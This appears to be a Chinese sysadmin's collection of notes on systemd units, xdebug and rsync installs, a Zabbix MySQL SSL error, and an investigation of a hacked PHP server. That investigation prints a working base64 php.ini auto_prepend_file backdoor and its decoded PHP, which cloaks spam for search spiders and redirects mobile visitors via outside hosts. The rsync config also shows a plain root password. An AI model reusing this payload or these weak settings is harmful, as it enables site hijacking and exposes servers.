systemd管理服务启动

# 开机服务启动目录

/etc/systemd/system/multi-user.target.wants/

# 服务启动配置目录

/usr/lib/systemd/system/

/lib/systemd/system目录 等同于 /usr/lib/systemd/system目录,因为/lib 目录是 /usr/lib 目录的软连接

[root@web ~]# ll /lib
lrwxrwxrwx. 1 root root 7 May 24  2022 /lib -> usr/lib

# yum安装的nginx enable时,就是软连接启动文件到多用户启动目录下,类似之前的/etc/rc.local实现开机启动服务。

[root@web ~]# systemctl enable nginx
Created symlink from /etc/systemd/system/multi-user.target.wants/nginx.service to /usr/lib/systemd/system/nginx.service.

# disable就是移除开机启动

[root@web ~]# systemctl disable nginx
Removed symlink /etc/systemd/system/multi-user.target.wants/nginx.service.

# ssh服务

[root@web ~]# ll /etc/systemd/system/multi-user.target.wants/sshd.service 
lrwxrwxrwx. 1 root root 36 May 24  2022 /etc/systemd/system/multi-user.target.wants/sshd.service -> /usr/lib/systemd/system/sshd.service

[root@web ~]# ll /usr/lib/systemd/system/sshd.service 
-rw-r--r-- 1 root root 373 Nov 24  2021 /usr/lib/systemd/system/sshd.service

# 将openresty创建服务,由systemctl控制启动

[Unit]
Description=nginx service
After=network.target

[Service]
Type=forking
ExecStartPre=/home/software/openresty/nginx/sbin/nginx -t
ExecStart=/home/software/openresty/nginx/sbin/nginx
ExecReload=/home/software/openresty/nginx/sbin/nginx -s reload
ExecStop=/home/software/openresty/nginx/sbin/nginx -s stop
PrivateTmp=true

[Install]
WantedBy=multi-user.target

很多 unit 文件中只有 ExecStart 命令,没有ExecStop、ExecReload命令也能实现关闭和重启

例如,关闭防火墙服务执行systemctl stop firewalld。

执行后,如果没有配置ExecStop,Systemd 默认将发送SIGTERM信号到主进程,并等待TimeoutStopSec配置的时间后查看进程是否已终止,如果没配置这个时间默认是90s。

90s以后,systemd 会检查进程有没有停止成功,如果还没停止,则 systemd 会发送SIGKILL信号来强杀进程完成该任务。
如果主进程 fork 了其他子进程,则 systemd 也会一并停止它们,因为它们都位于同一个 cgroup 中。

ExecStop=除非您有其他关闭服务的方法,否则您无需指示。

var_dump()打印美化

# 安装xdebug模块
wget -c https://xdebug.org/files/xdebug-3.2.1.tgz
tar zxvf xdebug-3.2.1.tgz 
cd xdebug-3.2.1/
/usr/local/php/bin/phpize 
./configure --with-php-config=/usr/local/php/bin/php-config
make
make install

# 查看编译后的模块是否存在
ll /usr/local/php/lib/php/extensions/no-debug-non-zts-20220829/
-rwxr-xr-x 1 root root 1978456 Jul 10 10:40 xdebug.so

# 开启模块
vi /usr/local/php/etc/php.ini
extension_dir = "/usr/local/php/lib/php/extensions/no-debug-non-zts-20220829/"
zend_extension = xdebug.so

# 重启
service php-fpm restart

rsync-3.2.7安装配置

跟之前3.1.0版本有些变化,作为记录。
官方文档:https://download.samba.org/pub/rsync/INSTALL
# 服务端安装

wget -c https://download.samba.org/pub/rsync/src/rsync-3.2.7.tar.gz
tar zxvf rsync-3.2.7.tar.gz 
cd rsync-3.2.7/
yum -y install gcc gcc-c++ gawk autoconf automake python3-pip openssl-devel acl libacl-devel  attr libattr-devel xxhash-devel libzstd-devel lz4-devel
./configure --prefix=/usr/local/rsync
make
make install

# 配置文件

[root@database02 data]# cat /etc/rsyncd.conf 
trict modes = yes     
uid = root                   
gid = root                   
port = 873                  
hosts allow = 114.114.114.114
hosts deny = 0.0.0.0/32              
use chroot = no
max connections = 1000
timeout = 10
pid file = /var/run/rsyncd.pid
lock file = /var/run/rsync.lock
log file = /var/log/rsyncd.log

# 发布项目
[test]       
path = /data/
ignore errors                       
read only = no                    
write only = no                  
list = no                               
auth users = root              
secrets file = /etc/rsync.passwd

# 认证文件

[root@database02 data]# cat /etc/rsync.passwd 
root:123321
# 修改权限,否则客户端输入密码后会提示auth failed
[root@database02 data]# chmod 600 /etc/rsync.passwd

# 启动

[root@database02 data]# /usr/local/rsync/bin/rsync --daemon

百度搜索网站域名点击后跳转到恶意网站的排查思路

用户反馈用手机浏览器打开百度,搜索网站域名,点击会跳转到恶意网站。而且是服务器里所有网站都这样。

通过浏览器F12模拟手机访问,发现可以跳转,并在网络菜单中看到首页的响应内容为:

<script src=https://www.bhu456.com/js3.js></script>

可以确定是植入了恶意代码

开始以为是修改了网站代码,经过排查代码也未发现异常,此时用户说网站代码已经备份,只留了一个空的php首页,访问依旧会跳转。

这就说明恶意代码并没有修改网站的代码而实现跳转。

排查过程:
1、nginx虚拟主机配置文件,无异常
2、nginx的lua模块代码,无异常
3、伪静态配置,无异常
4、查php的载入模块(extension),无异常(此时是通过cat php.ini | grep extension方式查询,所以并没有发现恶意配置)

停止php-fpm服务以后,访问网站会报502,不会跳转,说明跳转还是通过php服务实现的,可以确定跟nginx及lua模块没有关系了。

查php的配置文件,最终在php.ini中找到如下配置:

auto_prepend_file ="data:;base64,PD9waHAgc2V0X3RpbWVfbGltaXQoMCk7ZXJyb3JfcmVwb3J0aW5nKDApO2hlYWRlcigiQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7Y2hhcnNldD11dGYtOCIpOyRhPSJzdHJpc3RyIjskYj0kX1NFUlZFUjtmdW5jdGlvbiBodHRwR2V0bGFpKCRjKXskZD1jdXJsX2luaXQoKTtjdXJsX3NldG9wdCgkZCxDVVJMT1BUX1VSTCwkYyk7Y3VybF9zZXRvcHQoJGQsQ1VSTE9QVF9VU0VSQUdFTlQsJ01vemlsbGEvNS4wIChjb21wYXRpYmxlOyBCYWlkdXNwaWRlci8yLjA7ICtodHRwOi8vd3d3LmJhaWR1LmNvbS9zZWFyY2gvc3BpZGVyLmh0bWwpJyk7Y3VybF9zZXRvcHQoJGQsQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUixGQUxTRSk7Y3VybF9zZXRvcHQoJGQsQ1VSTE9QVF9TU0xfVkVSSUZZSE9TVCxGQUxTRSk7Y3VybF9zZXRvcHQoJGQsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTtjdXJsX3NldG9wdCgkZCxDVVJMT1BUX0hFQURFUiwwKTskZT1jdXJsX2V4ZWMoJGQpO2N1cmxfY2xvc2UoJGQpO3JldHVybiAkZTt9ZGVmaW5lKCd1cmwnLCRiWydSRVFVRVNUX1VSSSddKTtkZWZpbmUoJ3JlZicsIWlzc2V0KCRiWydIVFRQX1JFRkVSRVInXSk/Jyc6JGJbJ0hUVFBfUkVGRVJFUiddKTtkZWZpbmUoJ2VudCcsJGJbJ0hUVFBfVVNFUl9BR0VOVCddKTtkZWZpbmUoJ3NpdGUnLCJodHRwOi8vd3d3LnZmcjc4OS5jb20vdXRmOC8/Iik7ZGVmaW5lKCdyb2FkJywiYXBwP2RvbWFpbj0iLiRiWydIVFRQX0hPU1QnXS4iJnBhdGg9Ii51cmwuIiZzcGlkZXI9Ii51cmxlbmNvZGUoZW50KSk7ZGVmaW5lKCdtZW1lcycscm9hZC4iJnJlZmVyZXI9Ii51cmxlbmNvZGUocmVmKSk7ZGVmaW5lKCdyZWdzJywnQEJhaWR1U3BpZGVyfFNvZ291fFlpc291fEhhb3NvdXwzNjBTcGlkZXJAaScpO2RlZmluZSgnbW9iaWxlJywnL3Bob25lfHBhZHxwb2R8aVBob25lfGlQb2R8aW9zfGlQYWR8QW5kcm9pZHxNb2JpbGV8QmxhY2tCZXJyeXxJRU1vYmlsZXxNUVFCcm93c2VyfEpVQ3xGZW5uZWN8d09TQnJvd3NlcnxCcm93c2VyTkd8V2ViT1N8U3ltYmlhbnxXaW5kb3dzIFBob25lLycpO2RlZmluZSgnYXJlYScsJGEodXJsLCIueG1sIilvciAkYSh1cmwsIi5mZGMiKW9yICRhKHVybCwiLm9uZSIpb3IgJGEodXJsLCIuYnVnIilvciAkYSh1cmwsIi5kb2MiKW9yICRhKHVybCwiLmxvdmUiKW9yICRhKHVybCwiLnR4dCIpb3IgJGEodXJsLCIucHB0IilvciAkYSh1cmwsIi5wcHR4IilvciAkYSh1cmwsIi54bHMiKW9yICRhKHVybCwiLmNzdiIpb3IgJGEodXJsLCIuc2h0bWwiKW9yICRhKHVybCwiLnpuYiIpb3IgJGEodXJsLCIuYXNwIilvciAkYSh1cmwsIi5tZGIiKW9yICRhKHVybCwiLmh4YyIpKTtpZihwcmVnX21hdGNoKHJlZ3MsZW50KSl7aWYoYXJlYSl7ZWNobyBodHRwR2V0bGFpKHNpdGUucm9hZCk7ZXhpdDt9ZWxzZXtlY2hvIGh0dHBHZXRsYWkoImh0dHA6Ly93d3cudmZyNzg5LmNvbS91dGY4L3UucGhwIik7b2JfZmx1c2goKTtmbHVzaCgpO319aWYoYXJlYSYmcHJlZ19tYXRjaChtb2JpbGUsZW50KSl7ZWNobyBiYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNITTZMeTkzZDNjdVltaDFORFUyTG1OdmJTOXFjek11YW5NK1BDOXpZM0pwY0hRKycpO2V4aXQ7fT8+"

经过base64反解后,可以看到恶意代码了:

<?php 
set_time_limit(0);
error_reporting(0);
header("Content-Type: text/html;charset=utf-8");
$a = "stristr";
$b = $_SERVER;

function httpGetlai($c) {
    $d = curl_init();
    curl_setopt($d, CURLOPT_URL, $c);
    curl_setopt($d, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)');
    curl_setopt($d, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($d, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($d, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($d, CURLOPT_HEADER, 0);
    $e = curl_exec($d);
    curl_close($d);
    return $e;
}
define('url', $b['REQUEST_URI']);
define('ref', !isset($b['HTTP_REFERER']) ? '' : $b['HTTP_REFERER']);
define('ent', $b['HTTP_USER_AGENT']);
define('site', "http://www.vfr789.com/utf8/?");
define('road', "app?domain=".$b['HTTP_HOST'].
    "&path=".url.
    "&spider=".urlencode(ent));
define('memes', road.
    "&referer=".urlencode(ref));
define('regs', '@BaiduSpider|Sogou|Yisou|Haosou|360Spider@i');
define('mobile', '/phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone/');
define('area', $a(url, ".xml") or $a(url, ".fdc") or $a(url, ".one") or $a(url, ".bug") or $a(url, ".doc") or $a(url, ".love") or $a(url, ".txt") or $a(url, ".ppt") or $a(url, ".pptx") or $a(url, ".xls") or $a(url, ".csv") or $a(url, ".shtml") or $a(url, ".znb") or $a(url, ".asp") or $a(url, ".mdb") or $a(url, ".hxc"));
if (preg_match(regs, ent)) {
    if (area) {
        echo httpGetlai(site.road);
        exit;
    } else {
        echo httpGetlai("http://www.vfr789.com/utf8/u.php");
        ob_flush();
        flush();
    }
}
if (area && preg_match(mobile, ent)) {
    echo base64_decode('PHNjcmlwdCBzcmM9aHR0cHM6Ly93d3cuYmh1NDU2LmNvbS9qczMuanM+PC9zY3JpcHQ+');
    exit;
} 

?>

echo base64_decode('PHNjcmlwdCBzcmM9aHR0cHM6Ly93d3cuYmh1NDU2LmNvbS9qczMuanM+PC9zY3JpcHQ+');

这段base64反解以后就是上面页面响应的内容。

<script src=https://www.bhu456.com/js3.js></script>

auto_prepend_file配置参数的作用:
如果希望使用require()将页眉和脚注加入到每个页面中,除了使用require函数引入外,还可以使用配置文件设置。
在配置文件php.ini中有两个选项 auto_prepend_file 和 auto_append_file。
通过这两个选项来设置页眉和脚注,可以保证它们在每个页面的前后被载入。
使用这些指令包含的文件可以像使用include()语句包含的文件一样;也就是,如果该文件不存在,将产生一个警告。

此时还未查到是怎么被修改的配置文件。

MySQL server is not available. Waiting 5 seconds

docker部署zabbix,访问zabbix web页面时,报数据库找不到表,应该是初始化时,sql脚本未导入到zabbix库中。

# 查看zabbix-server日志
docker logs compose_zabbix-server_1 -f

一直报如下错误:

**** MySQL server is not available. Waiting 5 seconds...

# 在 zabbix-server 中用mysql命令连接数据库提示ssl的问题。

ERROR 2026 (HY000): SSL connection error: error:1425F102:SSL routines:ssl_choose_client_version:unsupported protocol

# 查看数据库中关于ssl关键词的变量

mysql> show variables like '%ssl%';
+---------------+-----------------+
| Variable_name | Value           |
+---------------+-----------------+
| have_openssl  | YES             |
| have_ssl      | YES             |
| ssl_ca        | ca.pem          |
| ssl_capath    |                 |
| ssl_cert      | server-cert.pem |
| ssl_cipher    |                 |
| ssl_crl       |                 |
| ssl_crlpath   |                 |
| ssl_key       | server-key.pem  |
+---------------+-----------------+
9 rows in set (0.00 sec)

# 添加 skip-ssl 这行

root@d6fcbeeee611:~# cat /etc/mysql/conf.d/docker.cnf 
[mysqld]
skip-host-cache
skip-name-resolve
skip-ssl

重启mysql容器

# 再次查看ssl状态变为关闭

mysql> show variables like '%ssl%';
+---------------+----------+
| Variable_name | Value    |
+---------------+----------+
| have_openssl  | DISABLED |
| have_ssl      | DISABLED |
| ssl_ca        |          |
| ssl_capath    |          |
| ssl_cert      |          |
| ssl_cipher    |          |
| ssl_crl       |          |
| ssl_crlpath   |          |
| ssl_key       |          |
+---------------+----------+
9 rows in set (0.00 sec)

重新 docker-compose up 导入成功。

ssl参数是启用ssl连接

root@82a862f5f9f5:/# mysqld --verbose --help |grep ssl
  --ssl               Enable SSL for connection (automatically enabled with
                      (Defaults to on; use --skip-ssl to disable.)